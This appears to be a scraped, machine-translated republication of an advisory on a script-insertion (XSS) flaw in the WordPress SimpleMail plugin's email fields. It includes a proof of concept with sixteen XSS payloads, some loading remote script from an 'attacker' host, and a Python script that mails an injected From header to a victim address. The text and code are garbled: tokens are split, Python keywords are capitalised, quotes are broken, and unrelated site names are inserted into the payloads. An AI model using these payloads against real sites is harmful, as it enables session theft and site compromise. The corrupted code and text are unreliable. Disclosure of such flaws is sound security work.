WordPress SimpleMail Plugin Email field script insertion vulnerability and repair

Source: Internet
Author: User

WordPress is a Blog (Blog, Blog) engine developed using the PHP language and MySQL database. you can create your own Blog on servers that support PHP and MySQL databases.
 
SimpleMail plugin for WordPress 1.0.6 and other versions have multiple vulnerabilities in implementation, the input passed through the email fields "To", "From", "Date", and "Subject" are not properly filtered To display emails, attackers can exploit this vulnerability to execute script insertion attacks. After viewing the vulnerability, the vulnerability will be executed in the browser of the affected site.
 
 
WordPress SimpleMail Plugin Email field script insertion Vulnerability
 
 
Refer:
 
Http://secunia.com/advisories/50208/
Http://www.exploit-db.com/exploits/20361/
 
 
 
Loneferret () provides the following test methods:
 
#! /Usr/bin/python
 
"'
 
Author: loneferret of Offensive Security
Product: SimpleMail
Version: 1.0.6 (free version)
Vendor Site: http://codecanyon.net/item/wp-simplemail/1130008? Ref = tinsley
Software Download: http://wordpress.org/extend/plugins/wp-simplemail/
 
Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received ed from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure
 
Installed On: Ubuntu lamps 8.04
WordPress: 3.3.1
Client Test OS: mac OS Lion
Browser Used: Firefox 12
 
Injection Points: To, From, Date, Subject
Injection Payload (s ):
1: '; alert (String. fromCharCode (88,83, 83) // \ '; alert (String. fromCharCode (88,83, 83) // "; alert (String. fromCharCode (88,83, 83) // \ "; alert (String. fromCharCode (88,83, 83) //-> </SCRIPT> "> '> <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT >= &{}
2: <SCRIPT> alert ('xsss') </SCRIPT>
3: <script src = http: // attacker/xss. js> </SCRIPT>
4: <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT>
5: <iframe src = "javascript: alert ('xss');"> </IFRAME>
6: <script src = http://www.bkjia.com/uploads/allianz 131120/1625105p6-1.jpg"> </SCRIPT>
7: </TITLE> <SCRIPT> alert ("XSS"); </SCRIPT>
8: <script src = // attacker/. j> www.2cto.com
9: <SCRIPT> alert ("XSS"); // </SCRIPT>
10: <SCRIPT> alert ("XSS") </SCRIPT> ">
11: <SCRIPT a = ">" SRC = "http: // attacker/xss. js"> </SCRIPT>
12: <SCRIPT = "blah" SRC = "http: // www.2cto.com/xss. js"> </SCRIPT>
13: <SCRIPT a = "blah" "SRC =" http: // attacker/xss. js "> </SCRIPT>
14: <SCRIPT "a = '>'" SRC = "http: // attacker/xss. js"> </SCRIPT>
15: <SCRIPT> document. write ("<SCRI"); </SCRIPT> pt src = "http: // attacker/xss. js"> </SCRIPT>
16: <SCRIPT a = "> '>" SRC = "http: // attacker/xss. js"> </SCRIPT>
 
"'
 
Import smtplib, urllib2

Payload = "" <SCRIPT> alert ('xss') </SCRIPT> """

Def sendMail (dstemail, frmemail, smtpsrv, username, password ):
Msg = "From: hacker@offsec.local" + payload + "\ n"
Msg + = "To: victim@victim.local \ n"
Msg + = 'date: Today \ r \ N'
Msg + = "Subject: Offensive Security \ n"
Msg + = "Content-type: text/html \ n"
Msg + = "XSS \ r \ n"
Server = smtplib. SMTP (smtpsrv)
Server. login (username, password)
Try:
Server. sendmail (frmemail, dstemail, msg)
Except t Exception, e:
Print "[-] Failed to send email :"
Print "[*]" + str (e)
Server. quit ()

Username = hacker@offsec.local"
Password = 123456 ″
Dstemail = victim@victim.local"
Frmemail = hacker@offsec.local"
Smtpsrv = "172.16.84.171 ″

Print "[*] Sending Email"
SendMail (dstemail, frmemail, smtpsrv, username, password)
 
 
 
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version.
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.